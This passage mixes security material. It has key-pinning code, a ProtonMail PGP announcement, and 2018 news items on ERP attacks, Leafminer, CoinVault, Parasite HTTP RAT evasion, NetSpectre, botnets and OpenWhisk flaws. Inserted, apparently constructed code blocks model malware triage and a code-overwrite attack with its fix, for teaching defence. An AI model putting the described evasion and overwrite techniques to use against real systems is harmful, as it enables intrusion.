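    return hashlib.sha256(public_key).hexdigest()


def sign_contact(contact: dict) -> dict:
    """Serialise the contact deterministically and attach a signature."""
    body = json.dumps(contact, sort_keys=True)
    sig = hmac.new(CONTACT_SIGNING_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return {"body": body, "sig": sig}


def load_contact(record: dict) -> dict:
    """Verify the signature before trusting anything inside the contact."""
    expected = hmac.new(CONTACT_SIGNING_SECRET, record["body"].encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, record["sig"]):
        raise ValueError("contact record signature invalid: possible tampering")
    return json.loads(record["body"])


def trust_public_key(email: str, public_key: bytes) -> dict:
    """'Trust Public Keys' for a contact: pin the fingerprint in a signed record."""
    return sign_contact({"email": email, "pinned_fingerprint": fingerprint(public_key)})


def select_encryption_key(record: Optional[dict], served_key: bytes) -> bytes:
    """Choose the key to encrypt to, given the key the provider served.

    Without a pinned contact the client has to take the served key on faith
    (the pre-Address-Verification situation). With one, a served key whose
    fingerprint differs from the pinned value is refused.
    """
    if record is None:
        return served_key
    contact = load_contact(record)
    if fingerprint(served_key) != contact["pinned_fingerprint"]:
        raise ValueError(f"key served for {contact['email']} does not match the trusted key")
    return served_key


def is_rejected(record: Optional[dict], served_key: bytes) -> bool:
    """True if the client refuses to encrypt with served_key for this contact."""
    try:
        select_encryption_key(record, served_key)
    except ValueError:
        return True
    return False


def tampered_record(record: dict, new_key: bytes) -> dict:
    """A record whose stored fingerprint was swapped without the signing key:
    the body changes but the signature stays the old one."""
    contact = json.loads(record["body"])
    contact["pinned_fingerprint"] = fingerprint(new_key)
    return {"body": json.dumps(contact, sort_keys=True), "sig": record["sig"]}


# Constructed byte strings standing in for PGP public keys.
ALICE_KEY = b"-----BEGIN PGP PUBLIC KEY BLOCK----- (alice, constructed)"
MALLORY_KEY = b"-----BEGIN PGP PUBLIC KEY BLOCK----- (attacker, constructed)"
```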

PGP Support
At the same time as Address Verification, we are also launching full support for PGP email encryption. As some of you may know, ProtonMail’s cryptography is already based upon PGP, and we maintain one of the world’s most widely used open source PGP libraries. PGP support is also an advanced feature that we don’t expect most users to use. If you need secure email, the easiest and most secure way to get it is still to get both you and your contact on ProtonMail, or if you are an enterprise, to migrate your business to ProtonMail.

However, for the many out there who still use PGP, the launch of full PGP support will make your life a lot easier. First, any ProtonMail user can now send PGP encrypted emails to non-ProtonMail users by importing the PGP public keys of those contacts. Second, it is also possible to receive PGP email at your ProtonMail account from any other PGP user in the world. You can now export your public key and share it with them.

Therefore, your ProtonMail account can in fact fully replace your existing PGP client. Instead of sharing your existing PGP public key, you can now share the PGP public key associated with your ProtonMail account and receive PGP encrypted emails directly in your ProtonMail account.

If you are an existing PGP user and you would like to keep your existing custom email address (e.g. john@mydomain.com), we’ve got you covered there, too. It is possible to move your email hosting to ProtonMail and import your existing PGP keys for your address, so you don’t need to share new keys and a new email address with your contacts.

If you are using PGP for sensitive purposes, this might actually be preferable to continuing to use your existing PGP client. For one, PGP is fully integrated into ProtonMail, encryption/decryption is fully automated, and the new Address Verification feature is used to protect you against MITM attacks. More importantly though, ProtonMail is not susceptible to the eFail class of vulnerabilities, which have impacted many PGP clients, and our PGP implementations are being actively maintained.

You can find more details about using PGP with ProtonMail here.

Introducing ProtonMail’s public key server
Finally, we are formally launching a public key server to make key discovery easier than ever. If your contact is already using ProtonMail, then key discovery is automatic (and you can use Address Verification to make it even more secure if you want). But if a non-ProtonMail user (like a PGP user) wants to email you securely at your ProtonMail account, they need a way to discover your public encryption key. If they don’t get it from your public profile or website, they are generally out of luck.

Our public key server solves this problem by providing a centralized place to look up the public key of any ProtonMail address (and non-ProtonMail addresses hosted at ProtonMail).

Our public key server can be found at hkps://api.protonmail.ch. Note that this address is used for HKP requests and cannot be opened in a browser. To download the public key of a ProtonMail user in a browser, replace “username@protonmail.com” with the address you are looking for in the following link: https://api.protonmail.ch/pks/lookup?op=get&search=username@protonmail.com

Concluding thoughts on open standards and federation
Today, ProtonMail is the world’s most widely used email encryption system, and for most of our users the addition of Address Verification and PGP support will not change how you use ProtonMail. In particular, setting up PGP (generating encryption keys, sharing them, and getting your contacts to do the same) is simply too complicated, and it is far easier for most people to simply create a ProtonMail account and benefit from end-to-end encryption and zero-access encryption without worrying about details like key management.

Still, launching PGP support is important to us. The beauty of email is that it is federated, meaning that anybody can implement it. It is not controlled by any single entity, it is not centralized, and there is not a single point of failure. While this does constrain email in many ways, it has also made email the most widespread and most successful communication system ever devised.

PGP, because it is built on top of email, is therefore also a federated encryption system. Unlike other encrypted communications systems, such as Signal or Telegram, PGP doesn’t belong to anybody, there is no single central server, and you aren’t forced to use one service over another. We believe encrypted communications should be open and not a walled garden. ProtonMail is now interoperable with practically ANY other past, present, or future email system that supports the OpenPGP standard, and our implementation of this standard is also itself open source.


We still have a long way to go before we can make privacy accessible to everyone, and in the coming months and years we will be releasing many more features and products to make this possible. If you would like to support our mission, you can always donate or upgrade to a paid plan.


US-CERT warns of ongoing cyber attacks aimed at ERP applications
28.7.2018 securityaffairs Attack

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers to an interesting report published by Digital Shadows and Onapsis.
US-CERT warns of cyber attacks on Enterprise Resource Planning (ERP) solutions such as Oracle and SAP; both nation-state actors and cybercrime syndicates are carrying out hacking campaigns against these systems.
The US-CERT bulletin references an analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.”

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, an impressive number of systems are exposed online without the necessary security measures, and it is quite easy for attackers to find public exploits that could be used to hack them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below are the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging the applications and compromising business-critical applications.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications to steal SAP user credentials and use them in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in the interest in exploits for SAP applications in the Dark Web.

Attack vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.

Threat actors continue to prefer well-known vulnerabilities over zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by the world’s largest commercial and government organizations.


“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Information leaked by third parties and employees can expose internal ERP applications.
Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. Information of this kind is a gift to attackers.

Experts recommend that organizations carefully review their configurations for known vulnerabilities, change default passwords, and enforce strong passwords for users.


Leafminer cyber espionage group targets Middle East
28.7.2018 securityaffairs CyberSpy

Hackers belonging to an Iran-linked APT group tracked as ‘Leafminer’ have targeted government and various other organizations in the Middle East.
An Iran-linked APT group tracked as ‘Leafminer’ has targeted governments and businesses in the Middle East.

According to the experts from Symantec, the Leafminer group has been active at least since early 2017.

“Symantec has uncovered the operations of a threat actor named Leafminer that is targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017. ” reads the analysis published by Symantec.

The experts detected malicious code and hacking tools associated with the cyber espionage group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries.

The extent of the campaigns conducted by the group could be wider: the researchers uncovered a list, written in Farsi, of 809 targets whose systems were scanned by the attackers.

The list groups the organizations of interest by geography and industry and includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Most of the targets were in the financial, government and energy sectors.


The hackers used publicly available tools and custom malware in their attacks.

“On a broad level, it has followed the recent trend among targeted attack groups for “living off the land”—using a mixture of publicly available tools alongside its own custom malware.” continues the report.

“More specifically, it mimicked Dragonfly’s use of a watering hole to harvest network credentials. It also capitalized on the Shadow Brokers release of Inception Framework tools, making use of the leaked Fuzzbunch framework by developing its own exploit payloads for it.”

Researchers discovered that hackers used three main techniques for initial intrusion of target networks:

Compromised web servers used for watering hole attacks
Scans/exploits for vulnerabilities of network services
Dictionary attacks against logins of network services

While analyzing the attacks conducted by the group, the experts discovered a download URL for a malware payload used to compromise the victims. The URL pointed to a compromised web server on the domain e-qht[.]az that had been used to distribute Leafminer malware, payloads, and tools within the group and to make them available for download from victim machines.

“As of early June 2018, the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers. In addition to malware and tools, the served files also included uploads of log files seemingly originating from vulnerability scans and post-compromise tools.” continues the report.

“The web shell is a modification of the PhpSpy backdoor and references the author MagicCoder while linking to the (deleted) domain magiccoder.ir. Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army.”

Symantec discovered two custom malware families used by the Leafminer group, tracked as Trojan.Imecab and Backdoor.Sorgu: the former provides persistent access protected by a hardcoded password, the latter implements classic backdoor features.

The group also leveraged a modified version of the popular Mimikatz post-exploitation tool. To avoid detection, the group used a technique dubbed Process Doppelgänging, disclosed in December 2017 by researchers from the security firm enSilo.

The technique is a fileless code injection method that exploits a built-in Windows function and an undocumented implementation of the Windows process loader.

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” concludes Symantec.


Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution
28.7.2018 securityaffairs Ransomware

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.
In 2015, Melvin (25) and Dennis van den B. (21) were arrested and brought before a district court in Rotterdam for their alleged involvement in the creation and distribution of the CoinVault ransomware.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, making other people’s work inaccessible, and extorting 1295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years. “

CoinVault ransomware was first spotted in the wild in May 2014, it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

The two suspects are Dutch brothers and were identified with the help of experts from Kaspersky Lab thanks to their poor operational security. The Kaspersky experts reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.” reported Kaspersky.
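The detail Kaspersky mentions above, a suspect's first name surviving in the PDB path compiled into the malware, is something an analyst checks in the first minutes of triage. The following is an added example, not Kaspersky's or the article's code: it scans a binary for the CodeView RSDS record that MSVC writes into PE files (4-byte signature, 16-byte GUID, 4-byte little-endian age, NUL-terminated path), recovers the fields, and pulls an account name out of a `C:\Users\<name>\` build path. SAMPLE_IMAGE is a constructed byte blob with a placeholder path, not a real sample, and the function names are mine.

```python
"""Recover the PDB (debug symbol) path embedded in a Windows PE image.

Added example, not Kaspersky's code. MSVC records the symbol file path in a
CodeView 'RSDS' record: 4-byte signature, 16-byte GUID, 4-byte little-endian
age, then a NUL-terminated path. Scanning a sample for that record is a
cheap triage step. SAMPLE_IMAGE is a constructed byte blob, not real
malware, and the embedded path is a placeholder.
"""
import re
import struct
import uuid
from typing import List, NamedTuple


class PdbRecord(NamedTuple):
    offset: int
    guid: str
    age: int
    path: str


# Constructed stand-in for a PE file: filler, one RSDS record, more filler.
PLACEHOLDER_PATH = b"C:\\Users\\developer\\source\\sample\\Release\\sample.pdb"
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62
    + b"RSDS" + bytes(range(16)) + struct.pack("<I", 3) + PLACEHOLDER_PATH + b"\x00"
    + b"\x90" * 32
)

# Signature, GUID, age, then a path of up to MAX_PATH bytes ended by NUL.
RSDS_RE = re.compile(
    rb"RSDS(?P<guid>.{16})(?P<age>.{4})(?P<path>[^\x00]{1,260})\x00", re.DOTALL
)


def find_pdb_paths(image: bytes) -> List[PdbRecord]:
    """Return every RSDS record found in the blob (a real PE normally has one)."""
    records = []
    for m in RSDS_RE.finditer(image):
        try:
            path = m.group("path").decode("utf-8")
        except UnicodeDecodeError:
            continue          # 'RSDS' bytes by coincidence, not a real record
        records.append(PdbRecord(
            offset=m.start(),
            guid=str(uuid.UUID(bytes_le=m.group("guid"))),   # Windows GUID byte order
            age=struct.unpack("<I", m.group("age"))[0],
            path=path,
        ))
    return records


def user_from_path(path: str) -> str:
    """Pull the account name out of a C:\\Users\\<name>\\... build path, or ''."""
    m = re.search(r"[\\/]Users[\\/]([^\\/]+)[\\/]", path, re.IGNORECASE)
    return m.group(1) if m else ""


if __name__ == "__main__":
    for rec in find_pdb_paths(SAMPLE_IMAGE):
        print(rec, "user:", user_from_path(rec.path))
```

The GUID and age are what a symbol server keys on, so they also let an analyst correlate builds that share a source tree even when the path itself has been changed.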

The two men, who have clean criminal records, avoided jail by cooperating with the authorities’ investigation. The court sentenced them to 240 hours of community service, which is the maximum community-service term that convicted persons can be given.
The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Regularly back up your important files to a separate drive or storage that is only temporarily connected.
Be on high alert for pop-ups, spam, and unexpected email attachments.


Parasite HTTP RAT implements a broad range of protections and evasion mechanisms
28.7.2018 securityaffairs Virus

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.
The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT uses string obfuscation and a sleep routine to delay execution and to check for sandboxes or emulated environments. It first checks whether an exception handler has run, then it checks whether between 900 ms and two seconds actually elapsed during the routine’s nominal 1-second sleep, which is split into 10 ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint.

If a sandbox is detected, the RAT halts execution and attempts to hinder forensic analysis.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT.

The Parasite HTTP RAT is written in the C programming language. The author claims it is small (49 KB) and has no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) server is encrypted. The author also offers a series of plugins for the malware, including user management, browser password recovery, FTP password recovery, IM password recovery, email password recovery, Windows license key recovery, hidden VNC, and a reverse SOCKS5 proxy.

It is interesting to note that the malware uses a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints, and it also removes hooks from a series of DLLs to complicate the work of malware analysts investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.


NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs Vulnerability

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows stealing data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that, like Spectre variant 1 (CVE-2017-5753), exploits a flaw in the speculative execution mechanism. The technique could bypass address-space layout randomization on the remote system and allow the attackers to execute code on the vulnerable system.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers who discovered the NetSpectre attack explained that the technique leverages an AVX-based covert channel to capture data at a slow rate of 60 bits per hour from the target system.

“we present NetSpectre, a generic remote Spectre variant 1 attack.” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cachefree Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system”

An attacker could carry out the NetSpectre attack to read arbitrary memory from systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish bits with a certain confidence” continues the paper.

The researchers reported the NetSpectre attack to Intel in March, and the tech giant addressed the issue with the first set of security patches it released.


Shipping Giant COSCO Hit by Ransomware
26.7.2018 securityweek Ransomware

Chinese state-owned shipping and logistics company COSCO was reportedly hit by a piece of ransomware that disrupted some of its systems in the United States.

COSCO, one of the world’s largest shipping companies, described the incident as a “local network breakdown” in the Americas region. The firm says it has suspended connections with other regions while it conducts an investigation.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,” COSCO stated.

While COSCO’s statement does not mention a cyberattack, the company told some news outlets that the disruptions are the result of a ransomware attack.


According to researcher Kevin Beaumont, the impacted infrastructure hosts COSCO’s website (cosco-usa.com), phone and email systems, and WAN and VPN gateways. The expert pointed out that the company resorted to using Twitter and Yahoo email accounts to communicate with customers.

The company’s U.S. systems still appear to be offline at the time of writing. It’s unclear if this was a targeted attack or if COSCO’s systems became infected as part of an opportunistic ransomware campaign.

If COSCO was truly hit by ransomware – it’s not uncommon for companies to misclassify cyber threats in the initial phases of an investigation – it would not be the first time a major shipping company has fallen victim to this type of attack.

One of the victims of last year’s NotPetya campaign, which caused losses of hundreds of millions of dollars for several major companies, was Danish shipping giant A.P. Moller–Maersk, which revealed that the incident forced its IT team to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers.

As a result of the attack, Maersk employees had to manually process 80 percent of the work volume while systems were being restored and the incident cost the company over $300 million.


Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet now reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution vulnerability in Belkin NetCam devices.

HomeMatic is a line of smart home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.


Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek Vulnerability

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.
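To make the /init and /run description above and the fix Rabbah describes concrete, here is an added example that is not Apache OpenWhisk's or IBM's code: a minimal model of an action container's proxy with the two endpoints, shown with and without a re-initialisation guard. In the unguarded case a compromised function can post new source to /init and every later invocation that reuses the container runs the replaced code; the guarded case refuses and logs a warning (the text says the real runtimes warn; refusing the request as well is my choice). Sockets are omitted: `handle()` is what the HTTP server on port 8080 would dispatch to, so the in-container request is a direct call. All names, the JSON shape and the sample action code are assumptions.

```python
"""Model of a FaaS action container's proxy with a re-initialisation guard.

Added example, not Apache OpenWhisk's or IBM's code. It mirrors the two
endpoints described above: /init receives the function source once, /run
executes it with arguments. The vulnerable behaviour is accepting a second
/init from code already running inside the container; the hardened proxy
refuses it and logs a warning. No sockets: handle() is the dispatch target.
"""
import json
import logging
from typing import Tuple

log = logging.getLogger("action-proxy")


class ActionProxy:
    def __init__(self, reject_reinit: bool = True) -> None:
        self.reject_reinit = reject_reinit
        self.namespace = None          # function globals after a successful /init
        self.init_count = 0

    def handle(self, method: str, path: str, body: str) -> Tuple[int, str]:
        """Dispatch one request; returns (HTTP status, JSON body)."""
        if method != "POST":
            return 405, json.dumps({"error": "method not allowed"})
        if path == "/init":
            return self._init(json.loads(body))
        if path == "/run":
            return self._run(json.loads(body))
        return 404, json.dumps({"error": "not found"})

    def _init(self, payload: dict) -> Tuple[int, str]:
        if self.namespace is not None and self.reject_reinit:
            # Hardened path: the platform initialises a container exactly once,
            # so a later /init can only originate from code already running in
            # it, i.e. a compromised function trying to rewrite itself.
            log.warning("rejected re-initialisation attempt (init_count=%d)", self.init_count)
            return 403, json.dumps({"error": "container already initialised"})
        namespace: dict = {}
        exec(payload["value"]["code"], namespace)      # load the action source
        if "main" not in namespace:
            return 502, json.dumps({"error": "no main() in action code"})
        self.namespace = namespace
        self.init_count += 1
        return 200, json.dumps({"OK": True})

    def _run(self, payload: dict) -> Tuple[int, str]:
        if self.namespace is None:
            return 502, json.dumps({"error": "container not initialised"})
        result = self.namespace["main"](payload.get("value", {}))
        return 200, json.dumps(result)


LEGIT_CODE = "def main(args):\n    return {'greeting': 'hello ' + args.get('name', 'world')}\n"
# Constructed stand-in for what a compromised function would push to /init.
ROGUE_CODE = "def main(args):\n    return {'greeting': 'hijacked'}\n"


def scenario(reject_reinit: bool) -> dict:
    """Platform init, a normal run, an in-container re-init, then another user's run."""
    proxy = ActionProxy(reject_reinit=reject_reinit)
    proxy.handle("POST", "/init", json.dumps({"value": {"code": LEGIT_CODE}}))
    _, first = proxy.handle("POST", "/run", json.dumps({"value": {"name": "alice"}}))
    reinit_status, _ = proxy.handle("POST", "/init", json.dumps({"value": {"code": ROGUE_CODE}}))
    _, second = proxy.handle("POST", "/run", json.dumps({"value": {"name": "bob"}}))
    return {"first": json.loads(first)["greeting"],
            "reinit_status": reinit_status,
            "second": json.loads(second)["greeting"]}


if __name__ == "__main__":
    print("unguarded:", scenario(reject_reinit=False))
    print("guarded:  ", scenario(reject_reinit=True))
```

The guard is deliberately state-based rather than network-based: filtering on source address would not help, because the rogue request and the legitimate platform request both arrive on the container's own loopback interface.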


US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."


Customer Identity and Access Management Firm LoginRadius Raises $17 Million
26.7.2018 securityweek IT

Vancouver, Canada-based customer identity and access management (cIAM) firm LoginRadius has raised $17 million Series A funding led by ForgePoint Capital and Microsoft's venture fund, M12.

Founded in 2012 by Rakesh Soni (CEO) and Deepak Gupta (CTO), LoginRadius has concentrated on cIAM -- initially as a social login provider, but now the provider of a multi-faceted, cloud-based, full-function cIAM platform. In its six years it has grown largely without external capital funding (previously raising a total of $2.3 million in initial and seed funding); and it has achieved triple digit growth in its last two years.

With the demand for customer (as opposed to enterprise) identity and access management growing rapidly, the new funding is designed to ensure that the firm can expand to meet potential requirements. Driving this growth is the ongoing digital transformation of business. Commercial enterprises are no longer satisfied with identity alone, but seek complete identity profiles of their customers in order to provide a more personalized service.


This makes cIAM a very different requirement to enterprise IAM. While enterprise IAM is concerned with validating the identity of a relatively small and finite number of known company employees, cIAM needs to handle the identity and profile of an infinite number of potentially worldwide internet customers.

"In customer identity you do not control the identity," Soni told SecurityWeek: "you just define it. Control remains with the customers who decide whether they want to keep the identity, destroy the identity, whether they want to access 20 of your brands or just one. And because the system faces outwards rather than inwards, the compliance requirements that are absent in employee identity becomes extremely critical -- especially, for example, with GDPR and the other privacy regulations popping up throughout the world."

